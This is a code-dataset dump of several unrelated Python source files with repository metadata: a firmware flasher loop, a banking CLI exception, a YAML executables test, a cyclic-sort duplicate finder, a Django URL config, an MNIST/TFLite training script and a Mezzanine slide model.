                    self.write(addrBuffer, MAX_BUFF_SIZE, buff_data)
                    self.write_32(addrBufSize, MAX_BUFF_SIZE)
                # Signal the chunk and re-arm the flasher-ready flag.
                self.write_32(addrImgRdy, 1)
                self.write_32(addrFlasherRdy, 0)
                if i != n_iter - 1:
                    # Wait until the flasher has consumed the chunk.
                    flasher_ready = self.read_32(addrFlasherRdy)
                    while flasher_ready == 0:
                        flasher_ready = self.read_32(addrFlasherRdy)
        return 0
| 4,374 | 16 | 185 |
cbd42cf638d83f88f7801c0085050d6aff52a697 | 305 | py | Python | exception/NoContent.py | crazyyzarc/Banking-System-public | 7163eb67b54a944b7e0521c1b4887e9058f2a75d | [
"MIT"
] | null | null | null | exception/NoContent.py | crazyyzarc/Banking-System-public | 7163eb67b54a944b7e0521c1b4887e9058f2a75d | [
"MIT"
] | null | null | null | exception/NoContent.py | crazyyzarc/Banking-System-public | 7163eb67b54a944b7e0521c1b4887e9058f2a75d | [
"MIT"
] | null | null | null | class NoContent(Exception):
"""
Triggert, wenn das ausgewählte Objekt kein Inhalt enthält
Caller: CLI
"""
class NoContent(Exception):
    """Raised when the selected object contains no content.

    Caller: CLI
    """

    def __init__(self, command):
        # Remember which command produced no entries, for the message below.
        self.command = command

    def __str__(self):
        return f"\n|> Kein Eintrag für {self.command!r} gefunden!\n"
| 131 | 0 | 53 |
85da6d6a1091ae5222952adc2d51828314426605 | 887 | py | Python | test/test_executables.py | by-student-2017/skpar-0.2.4_Ubuntu18.04LTS | aa35a9dc1746d12ce91ec0c1ba88f2464ef35543 | [
"MIT"
] | 9 | 2017-09-15T14:35:28.000Z | 2021-10-04T13:21:51.000Z | test/test_executables.py | by-student-2017/skpar-0.2.4_Ubuntu18.04LTS | aa35a9dc1746d12ce91ec0c1ba88f2464ef35543 | [
"MIT"
] | null | null | null | test/test_executables.py | by-student-2017/skpar-0.2.4_Ubuntu18.04LTS | aa35a9dc1746d12ce91ec0c1ba88f2464ef35543 | [
"MIT"
] | 3 | 2018-11-06T10:15:14.000Z | 2021-04-08T08:02:22.000Z | import unittest
import yaml
import logging
logging.basicConfig(level=logging.DEBUG)
logging.basicConfig(format='%(message)s')
logger = logging.getLogger(__name__)
class ExecutablesTest(unittest.TestCase):
    """Check if we can get the map of executables"""

    def test_getexemap(self):
        """Can we construct the dictionary for executables?"""
        yamldata = """executables:
            atom: gridatom
            skgen: skgen.sh
            lammps: mpirun -n 4 lmp_mpi
            bands: dp_bands band.out bands
        """
        # safe_load: yaml.load without an explicit Loader is deprecated (and
        # unsafe on untrusted input) since PyYAML 5.1; this data needs no
        # custom tags, so safe_load is a drop-in replacement.
        exedict = yaml.safe_load(yamldata).get('executables', None)
        try:
            for key, val in exedict.items():
                logger.debug("{:>10s} : {}".format(key, " ".join(val.split())))
        except AttributeError:
            # exedict is None when no executables are remapped.
            pass
if __name__ == '__main__':
unittest.main()
| 28.612903 | 80 | 0.609921 | import unittest
import yaml
import logging
logging.basicConfig(level=logging.DEBUG)
logging.basicConfig(format='%(message)s')
logger = logging.getLogger(__name__)
class ExecutablesTest(unittest.TestCase):
"""Check if we can get the map of executables"""
def test_getexemap(self):
"""Can we construct the dictionary for executables?"""
yamldata = """executables:
atom: gridatom
skgen: skgen.sh
lammps: mpirun -n 4 lmp_mpi
bands: dp_bands band.out bands
"""
exedict = yaml.load(yamldata).get('executables', None)
try:
for key, val in exedict.items():
logger.debug ("{:>10s} : {}".format(key, " ".join(val.split())))
except AttributeError:
# assume no executables are remapped
pass
if __name__ == '__main__':
unittest.main()
| 0 | 0 | 0 |
78cf8f3577f10272dda42004ec090137bb082d35 | 733 | py | Python | coding patterns/cyclic sort/duplicate_numbers.py | mkoryor/Python | 837ec4c03130dc4cb919fb5f1eeb4d31206790e4 | [
"Unlicense"
] | null | null | null | coding patterns/cyclic sort/duplicate_numbers.py | mkoryor/Python | 837ec4c03130dc4cb919fb5f1eeb4d31206790e4 | [
"Unlicense"
] | null | null | null | coding patterns/cyclic sort/duplicate_numbers.py | mkoryor/Python | 837ec4c03130dc4cb919fb5f1eeb4d31206790e4 | [
"Unlicense"
] | null | null | null |
"""
[E] We are given an unsorted array containing 'n' numbers taken from the range 1 to 'n'.
The array has some numbers appearing twice, find all these duplicate numbers without using any extra space.
Example 1:
Input: [3, 4, 4, 5, 5]
Output: [4, 5]
"""
# Time: O(n) Space: O(1)
main() | 19.810811 | 107 | 0.608458 |
"""
[E] We are given an unsorted array containing 'n' numbers taken from the range 1 to 'n'.
The array has some numbers appearing twice, find all these duplicate numbers without using any extra space.
Example 1:
Input: [3, 4, 4, 5, 5]
Output: [4, 5]
"""
# Time: O(n) Space: O(1)
def find_all_duplicates(nums):
    """Return every value appearing twice in *nums* (cyclic sort, O(1) extra space).

    *nums* holds numbers from the range 1..n and is rearranged in place:
    value v belongs at index v - 1. Afterwards, any slot not holding its
    home value holds a duplicate.
    """
    idx = 0
    size = len(nums)
    while idx < size:
        home = nums[idx] - 1
        if nums[idx] == nums[home]:
            # Either already in place, or a duplicate blocking this slot.
            idx += 1
        else:
            nums[idx], nums[home] = nums[home], nums[idx]
    return [value for pos, value in enumerate(nums) if value != pos + 1]
def main():
    """Print the duplicates found in the two sample inputs."""
    for sample in ([3, 4, 4, 5, 5], [5, 4, 7, 2, 3, 5, 3]):
        print(find_all_duplicates(sample))
main() | 393 | 0 | 45 |
75748216c6dbe303e57780eeeb96ed586dc84164 | 212 | py | Python | myapp/urls.py | quinchoponcho/helloworld | 89d019fe45520a49dc8b4b625e802a2030608554 | [
"MIT"
] | null | null | null | myapp/urls.py | quinchoponcho/helloworld | 89d019fe45520a49dc8b4b625e802a2030608554 | [
"MIT"
] | 5 | 2021-03-19T02:34:36.000Z | 2021-09-22T18:56:49.000Z | myapp/urls.py | quinchoponcho/helloworld | 89d019fe45520a49dc8b4b625e802a2030608554 | [
"MIT"
] | null | null | null |
from django.conf.urls import url
from django.conf.urls import include
from myapp import views
# Route the site root ('' -> dashboard view, reversible by the name
# 'dashboard').  The commented-out include is a placeholder for nesting
# this app's URLs under a /myapp/ prefix instead.
urlpatterns = [
    url(r'^$', views.dashBoard, name='dashboard'),
    #url(r'^myapp/', include('myapp.urls')),
]
| 17.666667 | 50 | 0.683962 |
from django.conf.urls import url
from django.conf.urls import include
from myapp import views
# Route the site root ('' -> dashboard view, reversible by the name
# 'dashboard').  The commented-out include is a placeholder for nesting
# this app's URLs under a /myapp/ prefix instead.
urlpatterns = [
    url(r'^$', views.dashBoard, name='dashboard'),
    #url(r'^myapp/', include('myapp.urls')),
]
| 0 | 0 | 0 |
0f453badacab02520c8d1fd266842e0f60f5ff75 | 2,214 | py | Python | third_party/tflite-micro/tensorflow/lite/micro/examples/neural_net1/neural_net1.py | bala122/CFU-Playground | 55e9aa33f13e6413c671f97b9f414bbbe5418550 | [
"Apache-2.0"
] | null | null | null | third_party/tflite-micro/tensorflow/lite/micro/examples/neural_net1/neural_net1.py | bala122/CFU-Playground | 55e9aa33f13e6413c671f97b9f414bbbe5418550 | [
"Apache-2.0"
] | null | null | null | third_party/tflite-micro/tensorflow/lite/micro/examples/neural_net1/neural_net1.py | bala122/CFU-Playground | 55e9aa33f13e6413c671f97b9f414bbbe5418550 | [
"Apache-2.0"
] | null | null | null | import tensorflow as tf
import numpy as np
import tensorflow_datasets as tfds
# Load the MNIST train/test splits as (image, label) pairs, together with
# dataset metadata (ds_info is used below for the shuffle-buffer size).
(ds_train, ds_test), ds_info = tfds.load(
    'mnist',
    split=['train', 'test'],
    shuffle_files=True,
    as_supervised=True,
    with_info=True,
)
def normalize_img(image, label):
    """Rescale pixel values to float32 in [0, 1]; the label passes through."""
    scaled = tf.cast(image, tf.float32) / 255.
    return scaled, label
# --- Training pipeline: normalize -> cache -> shuffle -> batch -> prefetch ---
ds_train = ds_train.map( normalize_img, num_parallel_calls=tf.data.AUTOTUNE)
ds_train = ds_train.cache()
# Shuffle buffer covers the whole train split: full reshuffle each epoch.
ds_train = ds_train.shuffle(ds_info.splits['train'].num_examples)
ds_train = ds_train.batch(128)
ds_train = ds_train.prefetch(tf.data.AUTOTUNE)
""" Testing pipeline"""
ds_test = ds_test.map(
    normalize_img, num_parallel_calls=tf.data.AUTOTUNE)
ds_test = ds_test.batch(128)
ds_test = ds_test.cache()
ds_test = ds_test.prefetch(tf.data.AUTOTUNE)
# Simple MLP classifier: 28x28 image -> 128 ReLU units -> 10 class logits.
model = tf.keras.models.Sequential([
  tf.keras.layers.Flatten(input_shape=(28, 28)),
  tf.keras.layers.Dense(128, activation='relu'),
  tf.keras.layers.Dense(10)
])
# from_logits=True because the final Dense layer applies no softmax.
model.compile(
    optimizer=tf.keras.optimizers.Adam(0.001),
    loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),
    metrics=[tf.keras.metrics.SparseCategoricalAccuracy()],
    run_eagerly = True
)
model.fit(
    ds_train,
    epochs=6,
    validation_data=ds_test,
)
"""Custom Inference test"""
# NOTE(review): model.summary is never *called* (missing parentheses), so
# this line is a no-op; `count` below is also unused.
model.summary
count = 0
#for data in ds_train:
#    print(model(data[0]))
""" Converting to TFlite"""
converter = tf.lite.TFLiteConverter.from_keras_model(model)
tflite_model = converter.convert()
with open('model.tflite', 'wb') as f:
  f.write(tflite_model)
# Reload the flatbuffer through the TFLite interpreter to sanity-check it.
interpreter = tf.lite.Interpreter(model_path="model.tflite")
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
input_shape = input_details[0]['shape']
""" Giving random input to model to see if it is computing properly"""
input_data = np.array(np.random.random_sample(input_shape), dtype=np.float32)
interpreter.set_tensor(input_details[0]['index'], input_data)
interpreter.invoke()
output_data = interpreter.get_tensor(output_details[0]['index'])
print(output_data)
# Final held-out evaluation of the (non-converted) Keras model.
print("Evaluate on test data")
results = model.evaluate(ds_test, batch_size=128)
print("test loss, test acc:", results)
| 28.384615 | 77 | 0.749322 | import tensorflow as tf
import numpy as np
import tensorflow_datasets as tfds
# Load the MNIST train/test splits as (image, label) pairs, together with
# dataset metadata (ds_info is used below for the shuffle-buffer size).
(ds_train, ds_test), ds_info = tfds.load(
    'mnist',
    split=['train', 'test'],
    shuffle_files=True,
    as_supervised=True,
    with_info=True,
)
def normalize_img(image, label):
    """Convert pixels to float32 scaled into [0, 1]; label is returned unchanged."""
    as_float = tf.cast(image, tf.float32)
    return as_float / 255., label
# --- Training pipeline: normalize -> cache -> shuffle -> batch -> prefetch ---
ds_train = ds_train.map( normalize_img, num_parallel_calls=tf.data.AUTOTUNE)
ds_train = ds_train.cache()
# Shuffle buffer covers the whole train split: full reshuffle each epoch.
ds_train = ds_train.shuffle(ds_info.splits['train'].num_examples)
ds_train = ds_train.batch(128)
ds_train = ds_train.prefetch(tf.data.AUTOTUNE)
""" Testing pipeline"""
ds_test = ds_test.map(
    normalize_img, num_parallel_calls=tf.data.AUTOTUNE)
ds_test = ds_test.batch(128)
ds_test = ds_test.cache()
ds_test = ds_test.prefetch(tf.data.AUTOTUNE)
# Simple MLP classifier: 28x28 image -> 128 ReLU units -> 10 class logits.
model = tf.keras.models.Sequential([
  tf.keras.layers.Flatten(input_shape=(28, 28)),
  tf.keras.layers.Dense(128, activation='relu'),
  tf.keras.layers.Dense(10)
])
# from_logits=True because the final Dense layer applies no softmax.
model.compile(
    optimizer=tf.keras.optimizers.Adam(0.001),
    loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),
    metrics=[tf.keras.metrics.SparseCategoricalAccuracy()],
    run_eagerly = True
)
model.fit(
    ds_train,
    epochs=6,
    validation_data=ds_test,
)
"""Custom Inference test"""
# NOTE(review): model.summary is never *called* (missing parentheses), so
# this line is a no-op; `count` below is also unused.
model.summary
count = 0
#for data in ds_train:
#    print(model(data[0]))
""" Converting to TFlite"""
converter = tf.lite.TFLiteConverter.from_keras_model(model)
tflite_model = converter.convert()
with open('model.tflite', 'wb') as f:
  f.write(tflite_model)
# Reload the flatbuffer through the TFLite interpreter to sanity-check it.
interpreter = tf.lite.Interpreter(model_path="model.tflite")
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
input_shape = input_details[0]['shape']
""" Giving random input to model to see if it is computing properly"""
input_data = np.array(np.random.random_sample(input_shape), dtype=np.float32)
interpreter.set_tensor(input_details[0]['index'], input_data)
interpreter.invoke()
output_data = interpreter.get_tensor(output_details[0]['index'])
print(output_data)
# Final held-out evaluation of the (non-converted) Keras model.
print("Evaluate on test data")
results = model.evaluate(ds_test, batch_size=128)
print("test loss, test acc:", results)
| 0 | 0 | 0 |
d9f2f20d45c541482fec86d710bf5f795fb2f806 | 2,192 | py | Python | mezzanine_slides/models.py | nielsonsantana/gnmk-mezzanine-slides | f03392838042fb830b3c2e1c760386f59b59955b | [
"BSD-2-Clause"
] | null | null | null | mezzanine_slides/models.py | nielsonsantana/gnmk-mezzanine-slides | f03392838042fb830b3c2e1c760386f59b59955b | [
"BSD-2-Clause"
] | null | null | null | mezzanine_slides/models.py | nielsonsantana/gnmk-mezzanine-slides | f03392838042fb830b3c2e1c760386f59b59955b | [
"BSD-2-Clause"
] | null | null | null | #! -*- encoding: utf-8 -*-
try:
from urllib import unquote
except ImportError: # assume python3
from urllib.parse import unquote
from string import punctuation
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.contrib.sites.models import Site
from mezzanine.pages.models import Page
from mezzanine.core.models import Orderable
from mezzanine.core.fields import FileField
class Slide(Orderable):
    """
    Allows for pretty banner images across the top of pages that will cycle
    through each other with a fade effect.
    """
    # Page this slide is attached to.
    page = models.ForeignKey(Page)
    # The slide image; Mezzanine's FileField with format='Image' renders an image picker.
    file = FileField(_('File'), max_length=200, upload_to='slides', format='Image')
    # Auto-filled from the file name on first save when left blank (see save()).
    description = models.CharField(_('Description'), blank=True, max_length=200)
    caption = models.CharField(_('Caption'), blank=True, max_length=200)
    # Optional click-through link for the slide.
    url = models.URLField(_(u'Link'), max_length=255, default="", blank=True, null=True)
    # Visibility flag consumed by SlideManager.get_public_slides().
    public = models.BooleanField(default=True, blank=True, verbose_name=u"Público",)
    site = models.ForeignKey(Site)
    objects = SlideManager()
    def save(self, *args, **kwargs):
        """
        If no description is given when created, create one from the
        file name.
        """
        if not self.id and not self.description:
            # Base name of the uploaded file: URL-decoded, extension stripped.
            name = unquote(self.file.url).split('/')[-1].rsplit('.', 1)[0]
            name = name.replace("'", '')
            # Turn remaining punctuation into spaces so words separate cleanly.
            name = ''.join([c if c not in punctuation else ' ' for c in name])
            # str.title() doesn't deal with unicode very well.
            # http://bugs.python.org/issue6412
            name = ''.join([s.upper() if i == 0 or name[i - 1] == ' ' else s
                            for i, s in enumerate(name)])
            self.description = name
        super(Slide, self).save(*args, **kwargs)
| 34.793651 | 88 | 0.646442 | #! -*- encoding: utf-8 -*-
try:
from urllib import unquote
except ImportError: # assume python3
from urllib.parse import unquote
from string import punctuation
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.contrib.sites.models import Site
from mezzanine.pages.models import Page
from mezzanine.core.models import Orderable
from mezzanine.core.fields import FileField
class SlideManager(models.Manager):
    """Default manager for Slide; adds a helper for publicly visible slides."""
    # Also use this manager for related-object accessors (e.g. page.slide_set).
    use_for_related_fields = True
    def get_public_slides(self):
        # Only slides explicitly flagged public=True.
        return super(SlideManager, self).get_queryset().filter(public=True)
class Slide(Orderable):
    """
    Allows for pretty banner images across the top of pages that will cycle
    through each other with a fade effect.
    """
    # Page this slide is attached to.
    page = models.ForeignKey(Page)
    # The slide image; Mezzanine's FileField with format='Image' renders an image picker.
    file = FileField(_('File'), max_length=200, upload_to='slides', format='Image')
    # Auto-filled from the file name on first save when left blank (see save()).
    description = models.CharField(_('Description'), blank=True, max_length=200)
    caption = models.CharField(_('Caption'), blank=True, max_length=200)
    # Optional click-through link for the slide.
    url = models.URLField(_(u'Link'), max_length=255, default="", blank=True, null=True)
    # Visibility flag consumed by SlideManager.get_public_slides().
    public = models.BooleanField(default=True, blank=True, verbose_name=u"Público",)
    site = models.ForeignKey(Site)
    objects = SlideManager()
    class Meta:
        verbose_name = _('Slide')
        verbose_name_plural = _('Slides')
        # Preserve Orderable's explicit drag-and-drop ordering.
        ordering = ['_order']
    def __unicode__(self):
        # Display label used by the admin (Python 2 era model).
        return self.description
    def save(self, *args, **kwargs):
        """
        If no description is given when created, create one from the
        file name.
        """
        if not self.id and not self.description:
            # Base name of the uploaded file: URL-decoded, extension stripped.
            name = unquote(self.file.url).split('/')[-1].rsplit('.', 1)[0]
            name = name.replace("'", '')
            # Turn remaining punctuation into spaces so words separate cleanly.
            name = ''.join([c if c not in punctuation else ' ' for c in name])
            # str.title() doesn't deal with unicode very well.
            # http://bugs.python.org/issue6412
            name = ''.join([s.upper() if i == 0 or name[i - 1] == ' ' else s
                            for i, s in enumerate(name)])
            self.description = name
        super(Slide, self).save(*args, **kwargs)
| 116 | 171 | 77 |